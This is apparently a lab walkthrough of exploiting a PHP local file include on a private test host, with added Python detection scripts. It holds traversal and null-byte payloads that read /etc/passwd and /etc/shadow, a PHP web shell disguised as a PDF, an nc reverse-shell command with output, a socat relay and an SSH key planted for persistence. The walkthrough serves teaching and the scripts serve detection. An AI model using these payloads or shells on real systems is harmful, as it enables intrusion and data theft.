References

Writeup

Detection of PHP include

  • Insert a non-existent path and see whether an error message appears; the error message shows that .php is appended after the file name
    • http://10.0.2.140/index.php?page=pentesterlab123randomvalue
  • Now insert a path to a file and append a null byte (%00) at the end to cut off the .php that is automatically appended
    • http://10.0.2.140/index.php?page=../../../../../etc/shadow%00
    • You can see the shadow file is read; it just fails on permissions (Permission denied)
  • Read /etc/passwd: http://10.0.2.140/index.php?page=../../../../../etc/passwd%00
  • Change the string into an array
    • http://10.0.2.140/index.php?page[]=login
  • Test remote file inclusion: RFI turns out to be disabled, so the Google page is not shown
    • http://10.0.2.140/index.php?page=http://www.google.com/?
  • So this site has:
    • Local file include;
    • The extension .php is appended to the submitted value
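From the defender's side, every probe above leaves a recognisable trace in the web server's access log: a `../` sequence, a `%00`, a `page[]` array parameter, a `page` value that is a URL, or simply a page name the application never had. The following Python is an added example (not part of the original writeup or of PentesterLab's material) that scans constructed Apache-style log lines modelled on the requests above and tags each suspicious parameter. The parameter name `page`, the allowlist of page names and the log lines themselves are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache-style access log lines modelled on the probes in the
# writeup above (not real captured traffic). Null bytes and traversal
# sequences appear here exactly as a server logs them: URL-encoded.
SAMPLE_LOG = """\
10.0.2.133 - - [08/Jan/2017:06:40:01 +0000] "GET /index.php?page=login HTTP/1.1" 200 512
10.0.2.133 - - [08/Jan/2017:06:40:05 +0000] "GET /index.php?page=pentesterlab123randomvalue HTTP/1.1" 200 301
10.0.2.133 - - [08/Jan/2017:06:40:09 +0000] "GET /index.php?page=../../../../../etc/shadow%00 HTTP/1.1" 200 288
10.0.2.133 - - [08/Jan/2017:06:40:12 +0000] "GET /index.php?page=../../../../../etc/passwd%00 HTTP/1.1" 200 1793
10.0.2.133 - - [08/Jan/2017:06:40:20 +0000] "GET /index.php?page[]=login HTTP/1.1" 200 402
10.0.2.133 - - [08/Jan/2017:06:40:25 +0000] "GET /index.php?page=http://www.google.com/? HTTP/1.1" 200 190
10.0.2.133 - - [08/Jan/2017:06:41:02 +0000] "GET /index.php?page=uploads/lfi.pdf%00&cmd=uname HTTP/1.1" 200 21
"""

# Common Log Format: client, ident, user, [timestamp], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)


def indicators(name, value):
    """Tags describing why one query parameter looks like an include probe.
    `value` is already percent-decoded, so %00 has become a real NUL."""
    tags = []
    if name.endswith("[]"):
        tags.append("array_coercion")   # page[]=... forces a string->array type change
    if "\x00" in value:
        tags.append("null_byte")        # truncates the appended .php on PHP < 5.3.4
    if re.search(r"(^|[\\/])\.\.([\\/]|$)", value):
        tags.append("path_traversal")
    if re.match(r"^[a-z][a-z0-9+.-]*://", value, re.I):
        tags.append("remote_url")       # RFI attempt, even if allow_url_include is off
    if re.search(r"/etc/(passwd|shadow)\b", value):
        tags.append("sensitive_file")
    return tags


def scan_access_log(text, include_params=("page",), allowed_pages=None):
    """Return one finding per request parameter that carries include-probe
    indicators, or that names a page outside the allowlist (when given)."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            tags = indicators(name, value)
            base = name[:-2] if name.endswith("[]") else name
            if (not tags and base in include_params
                    and allowed_pages is not None and value not in allowed_pages):
                tags.append("unlisted_page")   # e.g. the random-value probe for error messages
            if tags:
                findings.append({
                    "ip": m["ip"], "time": m["ts"], "param": name,
                    "value": value.replace("\x00", "%00"), "tags": tags,
                })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG, allowed_pages={"login"}):
        print(f["time"], f["param"], f["value"], ",".join(f["tags"]))
```

Without an allowlist the random-value probe is invisible to pattern matching, which is why knowing the application's legitimate page names matters more than any signature.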

Exploitation of remote file include

  • webshell.txt
    <?php
    system($_GET["cmd"]);
    ?>
    
  • http://10.0.2.140/index.php?page=http://10.0.2.130/webshell.txt&cmd=ifconfig
  • As noted earlier, RFI is disabled, so this does not succeed

Exploitation of local file include

  • Try uploading PHP code; first confirm:
    • Whether the extension is checked: the file name can be changed directly
    • Whether the content type is checked: it is part of the HTTP multipart message and can be modified through a proxy
  • This exercise has both restrictions, so both need to be handled. Ways to do it:
    • Add the PHP payload to an existing PDF (sometimes certain characters stop it from working properly)
    • Or create a new PHP file that looks like a PDF, which bypasses the content-type check:
      • First look at the PDF file format; the beginning contains the string %PDF-1.5 (may differ between versions):
        root@kali:~/Downloads# head -1 40992.pdf
        %PDF-1.5
        
      • Create a new file named lfi.pdf with this content:
        root@kali:~/Downloads# cat lfi.pdf
        %PDF-1.5
        <?php
        system($_GET["cmd"]);
        ?>
        
      • Check the content-type:
        root@kali:~/tools/80_HTTP/php# cat content-type-checker.php
        <?php
        echo mime_content_type('lfi.pdf') . "\n";
        ?>
        
        root@kali:~/tools/80_HTTP/php# php content-type-checker.php
        application/pdf
        
  • Upload and perform the file include:
    • http://10.0.2.140/index.php?page=uploads/lfi.pdf%00&cmd=uname
    • The page returns: %PDF-1.5 Linux

      Since PHP 5.3.4 you can't use the NULL byte trick to get rid of the extension when doing a local file include.

Post-Exploitation

  • If the target has no nc, it must be uploaded or downloaded directly on the target host (wget):
    • Upload:
      • Prepend %PDF-1.5 to nc and save it as nc.pdf
        $ echo "%PDF-" > pdfheader
        $ cat pdfheader nc > nc.pdf
        
      • Upload the file
      • Extract the content from the second line onward and save it as nc
        tail -n +2 nc.pdf > nc
        
  • Run a reverse shell: first listen on a port on the local host: nc -lnvp 80

    Using sudo (or root privileges) allows us to bind port 80; this port can't be bound as a normal user. Port 80 (HTTP) is less likely to be blocked. The following ports can also be tried: 21, 53, 443.

  • Run a command from the LFI:
    • http://10.0.2.140/index.php?page=uploads/lfi.pdf%00&cmd=nc%2010.0.2.133%2080%20-e%20/bin/bash
      root@kali:~/tools/80_HTTP/php# nc -lnvp 80
      listening on [any] 80 ...
      connect to [10.0.2.133] from (UNKNOWN) [10.0.2.140] 47845
      whoami
      www-data
      uname
      Linux
      id
      uid=33(www-data) gid=33(www-data) groups=33(www-data)
      

TCP redirection with socat

  • why socat?
  • First listen on port 443 on the local host (port 80 was already in use earlier) and forward it to port 2222
    sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr
    
  • Generate an SSH key
    • ssh-keygen -P "" -f vulnerable
      • -P "": an empty passphrase
      • -f: specifies the file name of the SSH key
  • Upload the SSH public key
    • Connect to the reverse shell
    • mkdir ~www-data/.ssh
    • echo "ssh-rsa AAAAB3Nz......tM/SQe19N8f9 attacker" >> ~/.ssh/authorized_keys
  • Then run the following command on the remote host; it makes the remote host relay traffic from 10.0.2.133:443 to its own port 22
    while true; do socat TCP4:10.0.2.133:443 TCP4:127.0.0.1:22 ; done
    
    • Once this is running, the reverse shell session can be closed
  • Finally connect to local port 2222; this port receives the traffic from 443, and the remote host is already connected to 443 and relays it to its own port 22:

    • Diagram: local (443 forwarded to 2222) ------------- (reverse shell connected to 443, traffic relayed to 22) remote
    • So connecting to port 2222 locally is the same as connecting to port 22 on the remote host

      root@kali:~/Downloads# ssh localhost -p 2222 -l www-data -i vulnerable
      Linux debian 2.6.32-5-686 #1 SMP Sun May 6 04:01:19 UTC 2012 i686
      
      The programs included with the Debian GNU/Linux system are free software;
      the exact distribution terms for each program are described in the
      individual files in /usr/share/doc/*/copyright.
      
      Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
      permitted by applicable law.
      Last login: Sun Jan  8 06:42:57 2017 from localhost
      $ id
      uid=33(www-data) gid=33(www-data) groups=33(www-data)
      
      • Here -l www-data is the user to log in as, and -i vulnerable specifies the private key
  • Finally, over SSH, bind the remote MySQL 127.0.0.1:3306 to local port 13306:
    ssh localhost -p 2222 -l www-data -i vulnerable -L 13306:localhost:3306
    
    • Here -L 13306:localhost:3306 means 13306 is the port listening on the local side and localhost:3306 is the MySQL port on the remote side
    • Then you can connect to the remote MySQL directly:
      mysql -h localhost -u root -P 13306
      
    • You can also telnet to see the banner; since we are already inside, services bound only to the local 127.0.0.1 can be reached too:
      root@kali:~/Downloads# telnet localhost 13306
      Trying ::1...
      Connected to localhost.
      Escape character is '^]'.
      ?
      5.1.63-0+squeeze1T0mWKQ5Uw9QlO#_9<_MD
      
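Every step in the post-exploitation and pivoting sections leaves host-level artefacts a defender can look for: an authorized_keys file under a service account's home, and outbound or loopback connections owned by www-data (the nc reverse shell, the socat relay to 443 and its loopback leg to 22). The Python below is an added audit example, not part of the writeup or PentesterLab's material; the passwd lines, file owners and socket table are constructed to mirror the session above, and the map of expected processes per account is an assumption.

```python
# Constructed snapshots modelled on the writeup's target (not real captures).
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/bin/sh
mysql:x:104:108:MySQL Server:/var/lib/mysql:/bin/false
"""

# path -> owner uid for a few files of interest (constructed)
FILES = {
    "/var/www/.ssh/authorized_keys": 33,
    "/var/www/uploads/lfi.pdf": 33,
    "/root/.ssh/authorized_keys": 0,
}

# (uid, process name, local addr, remote addr) for established TCP sockets,
# the fields an `ss -tnpe` listing provides once parsed (constructed)
SOCKETS = [
    (33, "apache2", "10.0.2.140:80", "10.0.2.133:50122"),
    (33, "nc", "10.0.2.140:47845", "10.0.2.133:80"),
    (33, "socat", "10.0.2.140:47901", "10.0.2.133:443"),
    (33, "socat", "127.0.0.1:47902", "127.0.0.1:22"),
    (104, "mysqld", "127.0.0.1:3306", "127.0.0.1:47903"),
]
LISTENING_PORTS = {22, 80, 3306}

# processes a service account is expected to run (assumption for this host);
# anything else making connections under that uid is worth a look
EXPECTED_PROCESSES = {"www-data": {"apache2"}, "mysql": {"mysqld"}}

SERVICE_UID_MAX = 999   # Debian system accounts live below 1000


def parse_passwd(text):
    """uid -> (name, home, shell) for every passwd line."""
    users = {}
    for line in text.splitlines():
        name, _pw, uid, _gid, _gecos, home, shell = line.split(":")
        users[int(uid)] = (name, home, shell)
    return users


def service_accounts(users):
    """Non-root system accounts: the web server and database users here."""
    return {uid: u for uid, u in users.items() if 0 < uid <= SERVICE_UID_MAX}


def find_service_account_keys(users, files):
    """A service account with an authorized_keys file is a persistence
    indicator: nothing legitimate logs in as www-data over SSH."""
    hits = []
    for uid, (name, home, _shell) in service_accounts(users).items():
        path = home.rstrip("/") + "/.ssh/authorized_keys"
        if path in files:
            hits.append((name, path, files[path]))
    return hits


def find_service_outbound(users, sockets, listening_ports, expected):
    """Connections owned by a service account whose local port is not one of
    its listeners (so they were initiated locally), excluding its expected
    daemons. The reverse shell and both socat legs show up this way."""
    hits = []
    svc = service_accounts(users)
    for uid, proc, local, remote in sockets:
        if uid not in svc:
            continue
        name = svc[uid][0]
        local_port = int(local.rsplit(":", 1)[1])
        if local_port in listening_ports:
            continue                      # inbound to a known listener
        if proc in expected.get(name, set()):
            continue                      # the account's own daemon
        hits.append((name, proc, remote))
    return hits


if __name__ == "__main__":
    users = parse_passwd(PASSWD)
    for h in find_service_account_keys(users, FILES):
        print("authorized_keys under service account:", h)
    for h in find_service_outbound(users, SOCKETS, LISTENING_PORTS, EXPECTED_PROCESSES):
        print("unexpected connection:", h)
```

The loopback leg (socat to 127.0.0.1:22) is the one a firewall never sees, which is why a host-side view of sockets per uid is needed in addition to egress filtering.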
